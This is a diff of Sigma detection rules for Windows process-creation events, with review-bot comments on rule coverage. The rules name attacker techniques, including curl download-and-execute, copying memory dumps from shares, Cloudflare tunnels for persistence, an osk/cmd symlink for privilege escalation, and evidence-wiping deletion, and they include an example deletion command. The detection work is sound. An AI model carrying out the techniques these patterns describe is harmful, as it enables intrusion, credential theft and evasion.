+++ b/sigma/builtin/process_creation/proc_creation_win_clip_execution.yml @@ -1,9 +1,7 @@ title: Data Copied To Clipboard Via Clip.EXE id: ddeff553-5233-4ae9-bbab-d64d2bd634be status: test -description: Detects the execution of clip.exe in order to copy data to the clipboard. - Adversaries may collect data stored in the clipboard from users copying information - within or between applications. +description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md @@ -21,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \clip.exe - - OriginalFileName: clip.exe + - NewProcessName|endswith: \clip.exe + - OriginalFileName: clip.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_cloudflared_portable_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cloudflared_portable_execution.yml index 7d80e1928..85a29faeb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cloudflared_portable_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cloudflared_portable_execution.yml @@ -1,10 +1,8 @@ title: Cloudflared Portable Execution id: fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd status: experimental -description: 'Detects the execution of the "cloudflared" binary from a non standard - location. - - ' +description: | + Detects the execution of the "cloudflared" binary from a non standard location. references: - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/ - https://github.com/cloudflare/cloudflared 
@@ -24,9 +22,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \cloudflared.exe + NewProcessName|endswith: \cloudflared.exe filter_main_admin_location: - NewProcessName|contains: + NewProcessName|contains: - :\Program Files (x86)\cloudflared\ - :\Program Files\cloudflared\ condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml index 9d23e479c..f00b1c2f3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml 
@@ -1,20 +1,15 @@ title: Cloudflared Quick Tunnel Execution id: 222129f7-f4dc-4568-b0d2-22440a9639ba related: - - id: 7050bba1-1aed-454e-8f73-3f46f09ce56a - type: similar - - id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 - type: similar + - id: 7050bba1-1aed-454e-8f73-3f46f09ce56a + type: similar + - id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 + type: similar status: experimental -description: 'Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be - used to tunnel local services such as HTTP, RDP, SSH and SMB. - - The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, - following a call to api[.]trycloudflare[.]com. - +description: | + Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. + The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware. - - ' references: - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/ - https://github.com/cloudflare/cloudflared 
@@ -33,58 +28,61 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \cloudflared.exe - - \cloudflared-windows-386.exe - - \cloudflared-windows-amd64.exe - - Hashes|contains: - - SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29 - - SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8 - - SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039 - - SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28 - - SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7 - - SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373 - - SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670 - - SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a - - SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0 - - SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1 - - SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2 - - SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac - - SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f - - SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d - - SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499 - - SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b - - SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f - - SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032 - - SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234 - - SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f - - SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058 - - SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c - - SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f - - 
SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5 - - SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3 - - SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4 - - SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c - - SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4 - - SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f - - SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad - - SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7 - - SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75 - - SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6 - - SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688 - - SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f - - SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663 - - SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77 - - SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078 + - NewProcessName|endswith: + - \cloudflared.exe + - \cloudflared-windows-386.exe + - \cloudflared-windows-amd64.exe + - Hashes|contains: + - SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29 + - SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8 + - SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039 + - SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28 + - SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7 + - SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373 + - SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670 + - SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a + - SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0 + - 
SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1 + - SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2 + - SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac + - SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f + - SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d + - SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499 + - SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b + - SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f + - SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032 + - SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234 + - SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f + - SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058 + - SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c + - SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f + - SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5 + - SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3 + - SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4 + - SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c + - SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4 + - SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f + - SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad + - SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7 + - SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75 + - SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6 + - SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688 + - SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f + - 
SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663 + - SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77 + - SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078 + # Note: + # Accounts for the cloudflared binaries being renamed + # `tunnel` is optional, but has been included to reduce the possibility of parameter collision when not observed with known binary names selection_param: - - CommandLine|contains|all: - - -url - - tunnel - - CommandLine|contains: - - .exe -url - - .exe --url + - CommandLine|contains|all: + - -url + - tunnel + - CommandLine|contains: + - .exe -url + - .exe --url selection_other: - CommandLine|contains|all: + CommandLine|contains|all: - -url - -no-autoupdate condition: process_creation and ((selection_img and selection_param) or selection_other) diff --git a/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml b/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml index 1d66b1d2d..7f469c151 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml @@ -1,8 +1,7 @@ title: Cloudflared Tunnel Connections Cleanup id: 7050bba1-1aed-454e-8f73-3f46f09ce56a status: experimental -description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" - flag in order to cleanup tunnel connections. +description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections. references: - https://github.com/cloudflare/cloudflared - https://developers.cloudflare.com/cloudflare-one/connections/connect-apps 
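Review bot: The `Hashes|contains` alternative in `selection_img` — the 38 SHA256 values — cannot match on `Channel: Security` / `EventID: 4688`, which as far as I know has no Hashes field, so on this log source `selection_img` reduces to the three file names and the hash list is maintenance weight that never fires. Renamed binaries are consequently caught only by `selection_other` (`-url` plus `-no-autoupdate`), not by `selection_img and selection_param` as the new note implies; the note should say so for the builtin variant, e.g. `# Note: Hashes is not populated in 4688 events; renamed binaries are only covered by selection_other`. Separately, `tunnel` in `selection_param` is a bare `contains` and will hit any unrelated argument containing that word; `' tunnel '` with surrounding spaces would be tighter. This hunk begins at the `@@ -33,58 +28,61 @@` header three lines up.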
@@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - 'cleanup ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-connector-id ' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_run.yml b/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_run.yml index e8dd72ddf..14b104eac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_run.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_run.yml @@ -1,9 +1,7 @@ title: Cloudflared Tunnel Execution id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 status: experimental -description: Detects execution of the "cloudflared" tool to connect back to a tunnel. - This was seen used by threat actors to maintain persistence and remote access - to compromised networks. +description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks. references: - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group - https://github.com/cloudflare/cloudflared @@ -24,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - ' run ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-credentials-contents ' - '-credentials-file ' diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_execution.yml index 3dbc66a4c..bd0a8f157 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_execution.yml 
@@ -1,19 +1,12 @@ title: Change Default File Association Via Assoc id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 related: - - id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 - type: similar + - id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 + type: similar status: test -description: 'Detects file association changes using the builtin "assoc" command. - - When a file is opened, the default program used to open the file (also called - the file association or handler) is checked. File association selections are stored - in the Windows Registry and can be edited by users, administrators, or programs - that have Registry access or by administrators using the built-in assoc utility. - Applications can modify the file association for a given file extension to call - an arbitrary program when a file with the given extension is opened. - - ' +description: | + Detects file association changes using the builtin "assoc" command. + When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md author: Timur Zinniatullin, oscd.community @@ -30,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: assoc + CommandLine|contains: assoc condition: process_creation and (all of selection_*) fields: - NewProcessName 
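Review bot: `CommandLine|contains: assoc` with no delimiter fires on any cmd.exe command line that contains those five letters — paths or arguments such as "associated" or "Associates" — which is far broader than the derived rule `ae6f14e6-14de-45b0-9f44-c0986f50dc89` that this one is marked similar to and which uses `'assoc '`. Consider `CommandLine|contains: 'assoc '` for consistency; a bare `assoc` that only lists associations would be lost, which seems an acceptable trade for a command-line-only match, or else document the breadth under falsepositives. The falsepositives and level fields of this rule are outside the hunk, so I cannot tell how the breadth is currently accounted for.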
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml index 03b53ce7d..373be0cfa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml 
@@ -1,20 +1,12 @@ title: Change Default File Association To Executable Via Assoc id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 related: - - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 - type: derived + - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 + type: derived status: test -description: 'Detects when a program changes the default file association of any extension - to an executable. - - When a file is opened, the default program used to open the file (also called - the file association or handler) is checked. File association selections are stored - in the Windows Registry and can be edited by users, administrators, or programs - that have Registry access or by administrators using the built-in assoc utility. - Applications can modify the file association for a given file extension to call - an arbitrary program when a file with the given extension is opened. - - ' +description: | + Detects when a program changes the default file association of any extension to an executable. + When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc author: Nasreddine Bencherchali (Nextron Systems) 
@@ -31,14 +23,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'assoc ' - exefile filter: - CommandLine|contains: .exe=exefile + CommandLine|contains: .exe=exefile condition: process_creation and (all of selection_* and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml index 688c7c07f..be153180c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml @@ -1,8 +1,7 @@ title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE id: 044ba588-dff4-4918-9808-3f95e8160606 status: experimental -description: Detects usage of the copy builtin cmd command to copy files with the - ".dmp"/".dump" extension from a remote share +description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ author: Nasreddine Bencherchali (Nextron Systems) @@ -14,17 +13,18 @@ logsource: category: process_creation product: windows detection: + # Example: copy \\\\\\process.dmp C:\Users\process.dmp process_creation: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - ' \\\\' - CommandLine|contains: + CommandLine|contains: - .dmp - .dump - .hdmp 
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml index d49ddd2d5..bdd3f3910 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml @@ -1,10 +1,9 @@ title: Curl Download And Execute Combination id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288 status: test -description: Adversaries can use curl to download payloads remotely and execute them. - Curl is included by default in Windows 10 build 17063 and later. +description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. references: - - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 + - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link author: Sreeman, Nasreddine Bencherchali (Nextron Systems) date: 2020/01/13 modified: 2023/03/06 @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c ' - 'curl ' - http diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_del_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_del_execution.yml index d3efb1e4b..7b5efef73 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_del_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_del_execution.yml 
@@ -1,18 +1,11 @@ title: File Deletion Via Del id: 379fa130-190e-4c3f-b7bc-6c8e834485f3 status: test -description: 'Detects execution of the builtin "del"/"erase" commands in order to - delete files. - +description: | + Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. - - Malware, tools, or other non-native files dropped or created on a system by an - adversary may leave traces to indicate to what was done within a network and how. - - Removal of these files can occur during an intrusion, or as part of a post-intrusion - process to minimize the adversary''s footprint. - - ' + Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. + Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase 
@@ -30,21 +23,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_del: - CommandLine|contains: + CommandLine|contains: - 'del ' - 'erase ' selection_flags: - CommandLine|contains: - - ' /f' - - ' /s' - - ' /q' + CommandLine|contains: + - ' /f' # Force deleting of read-only files. + - ' /s' # Delete specified files from all subdirectories. + - ' /q' # Quiet mode, do not ask if ok to delete on global wildcard condition: process_creation and (all of selection_*) falsepositives: - - False positives levels will differ Depending on the environment. You can use - a combination of ParentImage and other keywords from the CommandLine field - to filter legitimate activity + - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml index 8a0d4e6da..00c96edf1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml 
@@ -1,9 +1,7 @@ title: Greedy File Deletion Using Del id: 204b17ae-4007-471b-917b-b917b315c5db status: experimental -description: Detects execution of the "del" builtin command to remove files using - greedy/wildcard expression. This is often used by malware to delete content of - folders that perhaps contains the initial malware infection or to delete evidence. +description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. references: - https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase @@ -17,18 +15,20 @@ logsource: category: process_creation product: windows detection: + # Example: + # del C:\ProgramData\*.dll & exit process_creation: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_del: - CommandLine|contains: + CommandLine|contains: - 'del ' - 'erase ' selection_extensions: - CommandLine|contains: + CommandLine|contains: - \\\*.au3 - \\\*.dll - \\\*.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_dir_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_dir_execution.yml index af6d98c17..52ea556b1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_dir_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_dir_execution.yml 
@@ -1,8 +1,7 @@ title: Files And Subdirectories Listing Using Dir id: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006 status: test -description: Detects usage of the "dir" command that is part of Windows batch/cmd - to collect information about directories +description: Detects usage of the "dir" command that is part of Windows batch/cmd to collect information about directories references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md author: frack113 @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'dir ' - ' /s' - ' /b' diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_dosfuscation.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_dosfuscation.yml index f82df05e0..15b998429 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_dosfuscation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_dosfuscation.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ^^ - ^|^ - ',;,' @@ -35,6 +35,9 @@ detection: - ' s^et ' - ' s^e^t ' - ' se^t ' + # - '%%' + # - '&&' + # - '""' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_http_appdata.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_http_appdata.yml index a37e39808..9ac110720 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_http_appdata.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_http_appdata.yml 
@@ -1,9 +1,7 @@
 title: Command Line Execution with Suspicious URL and AppData Strings id: 1ac8666b-046f-4201-8aba-1951aaec03a3 status: test
-description: Detects a suspicious command line execution that includes an URL and - AppData string in the command line parameters as used by several droppers (js/vbs - > powershell)
+description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell) references: - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100 - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100
@@ -24,11 +22,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: - - http + CommandLine|contains|all: + - http # captures both http and https - :// - '%AppData%' - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe condition: process_creation and selection fields: - CommandLine
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml
index d20d123b0..3b59c080c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml
@@ -1,10 +1,7 @@
 title: Potential Privilege Escalation Using Symlink Between Osk and Cmd id: e9b61244-893f-427c-b287-3e708f321c6b status: test
-description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility - on-screen keyboard binary (osk.exe) using "mklink". This technique provides an - elevated command prompt to the user from the login screen without the need to - log in.
+description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. references: - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md - https://ss64.com/nt/mklink.html
@@ -23,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - mklink - \osk.exe - \cmd.exe
diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml
index 54acc8878..cc1ebfac7 100644
--- a/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml
@@ -1,8 +1,7 @@
 title: VolumeShadowCopy Symlink Creation Via Mklink id: 40b19fa6-d835-400c-b301-41f3a2baacaf status: stable
-description: Shadow Copies storage symbolic link creation using operating systems - utilities
+description: Shadow Copies storage symbolic link creation using operating systems utilities references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community
